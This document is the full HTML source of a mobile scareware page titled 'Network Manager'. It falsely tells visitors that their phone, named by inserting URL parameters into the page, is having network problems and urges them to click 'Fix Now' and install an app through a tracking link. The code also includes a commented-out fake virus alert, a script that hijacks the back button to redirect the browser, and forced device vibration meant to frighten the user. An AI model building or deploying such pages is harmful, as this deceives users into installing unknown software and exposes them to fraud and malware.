<!DOCTYPE html>
<html __fvdsurfcanyoninserted="1" class=" clickberry-extension clickberry-extension-standalone">
<head>
    <base href="">
    <title>Network Manager</title>

</head>

<body>

<!-- Translator Start -->


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<!--<script type="text/javascript">-->
    <!--&lt;!&ndash;alert("Warning！\n\nYour phone is severely infected by virus!\n\nDetected (7) virus in your Samsung mobile phone. Follow the instructions to proceed to fix your phone.\n\nDo not close the window.");&ndash;&gt;</script>-->

<title>Warning！</title>
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
<link type="text/css" href="style.css" rel="stylesheet">

<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="viewport" content="width=device-width">
<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex">

<style id="clearly_highlighting_css" type="text/css">.subhead {
    color: #FFF;
}

.subhead {
    color: #FFF;
}

.step {
    font-size: 36%;
}

.s {
    font-size: 18px;
}

.steps {
    font-size: 12px;
}
</style>

<header>
    <div class="logo"></div>
    <span class="app-name">Network Manager</span>
</header>
<script language="Javascript">
    function getURLParameter(name) {
        return decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || '');
    }
</script>
<div id="mainContainer">

    <div id="page" style="overflow:auto;">
        <div style="font-size: 70%; color: #090; display: block; text-align: center; padding: 4px;">


            <a href="http://www.baidu.com">
                <img src="sign.png" alt="" id="ipad"    style="width: 220px; margin-right: 10px;"></a>

        </div>
        <div style="background-color:#6be2f3;color:red; padding: 6px; font-size: 140%; text-align: center;">
            <strong>
            Your <script>document.write(getURLParameter('brand'))</script><script>document.write(getURLParameter('model'))</script> is experiencing network problems !</strong>
            <br><span>Wi-Fi and mobile data are affected.</span>
            <p></p>
        </div>
        <div style="padding-left: 25px; padding-right: 10px;">
            <p><span class="subhead">Network risk will affect your online shopping, disclosure of personal privacy, photos, data and applications.</span>
            </p>

            <p class="step" style="font-size: 100%; font-weight: bold; color: yellow; text-align: left;">

                How to fix your network：</p>
            <p class="s"
               style="font-size: 72%; font-weight:; color: white; line-height: 1.2; padding-bottom: 10px; text-align: left;">
  <span class="steps">
<strong>Step 1：</strong>Click the fix button to application page.<br><br>

<strong>Step 2：</strong>Install  the application to reopen your phone's network.</span></p>

        </div>
        <a href="http://vol.wwmtrk.com/click"
           style=" width: 200px; height: 50px; line-height: 45px; background: url(btn.gif); display: block; text-align: center; margin: 0 auto;font-family: Arial; font-size: 130%; color: #FFFFFF; font-weight: bold; text-decoration: none;">
            Fix Now
        </a>


    </div>


    <div id="footer">
        <p style="text-align: center;"></p>
    </div>
</div>


<!-- RDL Script -->
<!-- Function of the browser's back button -->
<script type="text/javascript">
    (function (window, location) {
        history.replaceState(null, document.title, location.pathname + "#!/index");
        history.pushState(null, document.title, location.pathname);

        window.addEventListener("popstate", function () {
            if (location.hash === "#!/index") {
                history.replaceState(null, document.title, location.pathname);
                setTimeout(function () {
                    location.replace("http://www.baidu.com");
                }, 0);
            }
        }, false);
    }(window, location));
</script>

<!-- END BACK -->

<script type="text/javascript">

    navigator.vibrate = navigator.vibrate ||

            navigator.webkitVibrate ||

            navigator.mozVibrate ||

            navigator.msVibrate;


    navigator.vibrate([1000, 500, 1000, 500, 1000, 500,]);

</script>


</body>
</html><!-- Translator End -->